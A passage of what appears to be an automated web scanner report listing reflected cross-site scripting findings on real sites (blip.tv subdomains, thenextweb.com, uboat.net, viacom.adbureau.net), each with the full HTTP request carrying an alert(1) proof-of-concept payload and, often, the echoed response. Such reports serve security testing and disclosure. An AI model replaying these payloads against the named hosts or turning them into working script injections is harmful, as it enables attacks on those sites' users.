http://sourceboston2008.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a96b9'%3balert(1)//ac16476f5de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a96b9';alert(1)//ac16476f5de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?a96b9'%3balert(1)//ac16476f5de=1 HTTP/1.1 Host: sourceboston2008.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.86. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourceboston2008.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6a5"><script>alert(1)</script>1e232d81774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?bf6a5"><script>alert(1)</script>1e232d81774=1 HTTP/1.1 Host: sourceboston2008.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.87. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourceboston2009.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f00'%3balert(1)//ce990a6fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22f00';alert(1)//ce990a6fdd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?22f00'%3balert(1)//ce990a6fdd2=1 HTTP/1.1 Host: sourceboston2009.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.88. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourceboston2009.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282e3"><script>alert(1)</script>0b14ceaf125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?282e3"><script>alert(1)</script>0b14ceaf125=1 HTTP/1.1 Host: sourceboston2009.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.89. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourceboston2010.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2b"><script>alert(1)</script>973845e00e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?3ca2b"><script>alert(1)</script>973845e00e3=1 HTTP/1.1 Host: sourceboston2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.90. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourceboston2010.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eccf8'%3balert(1)//75f0ef58d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eccf8';alert(1)//75f0ef58d87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?eccf8'%3balert(1)//75f0ef58d87=1 HTTP/1.1 Host: sourceboston2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the awesm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82105</script><script>alert(1)</script>ebaf4f8c75 was submitted in the awesm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.92. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8bd</script><script>alert(1)</script>73986555b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1 HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bcc</script><script>alert(1)</script>f5ad851bd4d was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d1ad</script><script>alert(1)</script>24749fe4f25 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a19e</script><script>alert(1)</script>fa26e178082 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082 HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2a26<script>alert(1)</script>f4d51860e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icof2a26<script>alert(1)</script>f4d51860e62 HTTP/1.1 Host: uboat.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral
The value of REST URL parameter 1 is copied into an HTML comment. The payload eeee5--><script>alert(1)</script>d24a13b2fbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoeeee5--><script>alert(1)</script>d24a13b2fbf HTTP/1.1 Host: uboat.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e308--><script>alert(1)</script>08f8526848f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history8e308--><script>alert(1)</script>08f8526848f/wwi/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 9023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <!--404, /history8e308--><script>alert(1)</script>08f8526848f/wwi/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history8e308--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0c5<script>alert(1)</script>d32186e7767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /historyba0c5<script>alert(1)</script>d32186e7767/wwi/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 8906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <strong>http://uboat.net/historyba0c5<script>alert(1)</script>d32186e7767/wwi/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dfcc<script>alert(1)</script>3770393b851 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history/wwi1dfcc<script>alert(1)</script>3770393b851/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 9014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <strong>http://uboat.net/history/wwi1dfcc<script>alert(1)</script>3770393b851/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a303--><script>alert(1)</script>de1b2bc497a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 8922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <!--404, /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history/wwi3a303--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1407'%3balert(1)//6b06bfedd3b was submitted in the REST URL parameter 2. This input was echoed as d1407';alert(1)//6b06bfedd3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserverd1407'%3balert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS21 Content-Type: text/html Content-Length: 2332 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52531'%3balert(1)//e133daf0ee1 was submitted in the REST URL parameter 3. This input was echoed as 52531';alert(1)//e133daf0ee1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserver//height52531'%3balert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS25 Content-Type: text/html Content-Length: 2332 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var payload5292, tempStr, tempInt, aamWidth, aamHeight, atlasUr ...[SNIP]... tr = destStr.substring((destStr.length - 7)); if (tempStr.search(/\?click\=/i) > -1) destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height52531';alert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload ...[SNIP]...
3.104. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f655b'%3balert(1)//9025d8e1577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f655b';alert(1)//9025d8e1577 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b'%3balert(1)//9025d8e1577=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS17 Content-Type: text/html Content-Length: 2335 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543?f655b'%3balert(1); expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b4dd'%3balert(1)//9cd18a86ff4 was submitted in the REST URL parameter 1. This input was echoed as 8b4dd';alert(1)//9cd18a86ff4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver8b4dd'%3balert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS22 Content-Type: text/html Content-Length: 2310 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6779'%3balert(1)//985a6732d77 was submitted in the REST URL parameter 2. This input was echoed as e6779';alert(1)//985a6732d77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/heighte6779'%3balert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS22 Content-Type: text/html Content-Length: 9999 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
3.107. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56888'%3balert(1)//4857672fae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56888';alert(1)//4857672fae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888'%3balert(1)//4857672fae1=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS24 Content-Type: text/html Content-Length: 2858 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10202'%3balert(1)//4440355789c was submitted in the REST URL parameter 1. This input was echoed as 10202';alert(1)//4440355789c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver10202'%3balert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS24 Content-Type: text/html Content-Length: 2306 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac12'%3balert(1)//af0eabc09d9 was submitted in the REST URL parameter 2. This input was echoed as cac12';alert(1)//af0eabc09d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/heightcac12'%3balert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS25 Content-Type: text/html Content-Length: 2306 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var payload5292, tempStr, tempInt, aamWidth, aamHeight, atlasUr ...[SNIP]... Str = destStr.substring((destStr.length - 7)); if (tempStr.search(/\?click\=/i) > -1) destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/heightcac12';alert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload5292';
/* Try ...[SNIP]...
3.110. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400d4'%3balert(1)//32c671dbab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 400d4';alert(1)//32c671dbab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4'%3balert(1)//32c671dbab7=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS15 Content-Type: text/html Content-Length: 2309 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload5292';
/* Try to get the width and height from AAMLib first */ / ...[SNIP]...
